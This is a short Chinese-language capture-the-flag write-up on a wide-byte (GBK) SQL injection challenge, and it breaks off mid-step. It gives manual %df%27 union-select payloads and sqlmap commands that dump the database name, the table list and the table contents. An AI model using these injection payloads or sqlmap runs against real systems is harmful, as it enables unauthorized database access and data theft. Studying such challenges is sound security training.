SQL注入
题目:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1 本题为宽字节注入,本文重点讲解SQL注入相关方法。 方法一: 1、爆出数据库 手工 id=%df%27%20union%20select%201,%20database()%23 工具 python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' --current-db 2、爆出表 手工 id=%df%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23 工具 python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover --tables 3、爆出表的内容 手工 id=%df%27 union select...